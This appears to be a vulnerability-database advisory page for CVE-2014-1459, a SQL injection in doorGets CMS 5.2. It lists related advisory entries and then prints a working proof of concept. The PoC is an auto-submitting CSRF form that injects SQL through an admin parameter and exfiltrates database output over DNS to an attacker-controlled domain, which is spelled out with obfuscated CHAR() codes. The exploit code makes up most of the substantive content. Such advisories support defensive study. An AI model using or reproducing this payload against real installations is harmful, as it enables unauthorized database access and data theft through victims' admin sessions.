| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| doorGets CMS 5.2 - SQL Injection Vulnerability | 8 Feb 201400:00 | – | zdt | |
| CVE-2014-1459 | 11 Feb 201417:00 | – | cve | |
| CVE-2014-1459 | 11 Feb 201417:00 | – | cvelist | |
| doorGets CMS 5.2 - SQL Injection | 7 Feb 201400:00 | – | exploitdb | |
| EUVD-2014-1535 | 7 Oct 202500:30 | – | euvd | |
| doorGets CMS 5.2 - SQL Injection | 7 Feb 201400:00 | – | exploitpack | |
| SQL Injection in doorGets CMS | 15 Jan 201400:00 | – | htbridge | |
| CVE-2014-1459 | 11 Feb 201417:55 | – | nvd | |
| doorGets CMS 5.2 SQL Injection | 6 Feb 201400:00 | – | packetstorm | |
| Sql injection | 11 Feb 201417:55 | – | prion |
The following exploitation example is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will use a CSRF vector to send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
<form action="http://[host]/dg-admin/?controller=rubriques" method="post" name="main">
<input type="hidden" name="_position_down_id" value="1 AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHA R(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 )))) -- ">
<input type="hidden" name="_position_down_position" value="1">
<input type="hidden" name="_position_down_submit" value="1">
<input type="hidden" name="_position_down_type" value="down">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation